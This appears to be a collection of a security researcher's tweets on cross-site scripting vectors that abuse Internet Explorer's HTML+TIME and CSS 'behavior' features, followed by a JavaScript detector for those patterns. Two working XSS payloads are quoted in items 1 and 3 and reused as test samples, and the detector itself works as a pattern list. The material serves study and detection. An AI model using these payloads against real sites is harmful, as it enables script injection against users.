1. https://twitter.com/0x6D6172696F/status/7180793115:
Ever heard about IE's HTML+TIME? http://is.gd/5G60U - enabling vectors like this: 1<x/style=`behavior:url(#default#time2)`onbegin=alert(2)>
2. https://twitter.com/0x6D6172696F/status/7196312532:
More HTML+TIME - changing link targets: http://pastebin.com/f521ea4e6
3. https://twitter.com/0x6D6172696F/status/7196350903:
XSS via style attribute - it's back :) <a style=behavior:url(#default#anchorclick) folder=javascript:alert(1) href=http://good.com>IE8</a>
4. https://twitter.com/0x6D6172696F/status/7197250108:
Just to have this little rascal persisted - self-executing XSS with ALL HTML elements on IE8 http://pastebin.com/f3712ff6a
More info on HTML+TIME:
* http://msdn.microsoft.com/de-de/library/ms533099%28en-us,VS.85%29.aspx
* http://msdn.microsoft.com/de-de/library/ms533102%28en-us,VS.85%29.aspx
* http://www.w3.org/TR/NOTE-HTMLplusTIME
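
A detection-side check for the attribute patterns in items 1 and 3 above, added here as an example and not code from the original tweets or pastes. It flags `behavior:` in a style attribute, any `on*` attribute (so `onbegin` is caught without being listed) and a `javascript:` value in any attribute (so `folder` is caught). The function name and finding labels are assumptions, and the regex parsing is a triage aid for logs or stored input, not a sanitizer.

```javascript
// Tag opener: element name, then everything up to the next '>'.
const TAG = /<([a-z][^\s\/>]*)([^>]*)>/gi;
// Attribute name with optional value. IE also accepts backticks as value
// quotes and '/' as a separator between the tag name and its attributes.
const ATTR = /([^\s\/=`"'<>]+)(?:\s*=\s*("[^"]*"|'[^']*'|`[^`]*`|[^\s>]*))?/g;

// Remove one pair of matching surrounding quotes (", ' or `), if present.
function unquote(v) {
  return /^(["'`]).*\1$/s.test(v) ? v.slice(1, -1) : v;
}

// Returns one finding per suspicious attribute: { tag, attr, reason }.
function findLegacyIeVectors(html) {
  const findings = [];
  for (const [, tag, rest] of html.matchAll(TAG)) {
    for (const [, rawName, rawValue = ""] of rest.matchAll(ATTR)) {
      const name = rawName.toLowerCase();
      // Drop CSS comments, whitespace and control characters before matching.
      const flat = unquote(rawValue)
        .replace(/\/\*.*?\*\//gs, "")
        .replace(/[\s\x00-\x1f]+/g, "")
        .toLowerCase();
      let reason = null;
      if (name === "style" && flat.includes("behavior:")) {
        reason = "css-behavior";      // e.g. #default#time2, #default#anchorclick
      } else if (name.startsWith("on")) {
        reason = "event-handler";     // deliberately broad: any on* name
      } else if (flat.startsWith("javascript:")) {
        reason = "javascript-url";    // checked on every attribute, not only href/src
      }
      if (reason) findings.push({ tag: tag.toLowerCase(), attr: name, reason });
    }
  }
  return findings;
}

// Inputs: the two strings quoted in items 1 and 3, plus a constructed benign link.
const SAMPLES = [
  "1<x/style=`behavior:url(#default#time2)`onbegin=alert(2)>",
  "<a style=behavior:url(#default#anchorclick) folder=javascript:alert(1) href=http://good.com>IE8</a>",
  '<a href="https://example.com/" style="color:red">ok</a>',
];
for (const s of SAMPLES) console.log(JSON.stringify(findLegacyIeVectors(s)));
```
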